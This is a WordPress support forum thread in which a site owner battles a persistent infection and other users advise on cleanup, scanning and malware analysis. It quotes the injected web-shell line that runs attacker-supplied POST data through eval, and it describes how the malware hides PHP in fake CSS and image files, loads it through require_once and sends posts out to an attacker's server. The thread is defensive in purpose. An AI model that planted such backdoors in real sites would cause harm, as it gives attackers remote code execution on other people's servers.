@eval($_POST[“wp_ajx_request”]);

Rather than asking “what malware”, focus on cleaning. Assume *every single* .php file on your server could be infected. Remove them all and replace them with new files from clean sources (e.g., www.ads-software.com). Recreate your wp-config.php file from the wp-config-sample.php.

It’s not fun, it’s not fast.

Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

I have been battling this for the last 7 hours. I wouldnt have sought help here without giving the best try I could. I already replaced the new version of WP (wordpress-4.9.8-en_AU).

I replaced all the plugin files. I even checked the DB, I even managed to run through licensed theme files.

Make sure you delete wp-admin and wp-includes before re-uploading WP, and check wp-contents/uploads/* for .php files.

Also, install WordFence and run a “high sensitivity scan”.

I tried what you said and there are no .php files in the /uploads folder.

Funniest thing I tried WordFence and even that plugins gets deactivated because that get written on it.

I even worked on the permissions of the folders and that did not help.

??

check .htaccess, wp-config.php and look for hidden files. Also, check for .js files that don’t belong.

I even tried Quttera Web Malware Scanner and it did not help ??

Your site is hacked. That’s the plain and simple truth. Change every password related to it — every WP user password, your hosting password, and your DB password. Backup your database and uploads and discard everything else. Reinstall WP, your themes, and data. And, if you’re unable to do it, hire one of the firms that specializes in cleaning WP sites.

Hi!.

I searched the internet for a solution to this problem. I did not find anything, so I analyzed all my system manually and found the following regarding this hack.

– It hides in .css file and images (jpg, png, gif), in my case it was in the “Product Gallery Slider” plugin with the name “bootstrap.min.css” but it really is php.

– It is called at the beginning of the plugin. In my case, “require_once(dirname(__FILE__) .’/css/bootstrap.min.css’);” in woocommerce-slider.php.

– According to the code, it performs the following actions:
— Two new clases “WpPlLoadContent” and “WpPlaginLoad”
— Create mysql data in “postmeta” with meta_key “_wp_session_tocen_temporery”
— Send all post from “post WHERE post_status=”publish” AND (post_type=”post” OR post_type=”page”)” to one IP (hack server).

— Modify base archives:
* /wp-admin/includes/class-pclzip.php
* /wp-includes/SimplePie/Cache/File.php

— Insert code “@eval($_POST[“wp_ajx_request”]);” in:
* functions.php of the THEMES
* base file .php of the ACTIVE PLUGINS

— Create fake images with hack code (eval).
I clone your images with “filename”-122×356

Solution for this.

1o. Maintenance mode NOT REFRESH URL before finishing process (wp-admin yes)
2o. Search the fake css code ( Wordfence Hight Sensivity Scanner) or search manually (Dreamweaver or Notepad++)
3o. Remove or clear this hack file and search require or include this file.
5o. Remove all -122×365 images
6o. Replace base archives (class-pclzip.php and Cache/File.php)
7o. Sanitize all .php plugins files (remove @eval) for his code.
8o. Activate all plugins
9o. Run!.

Sorry my english, google traductor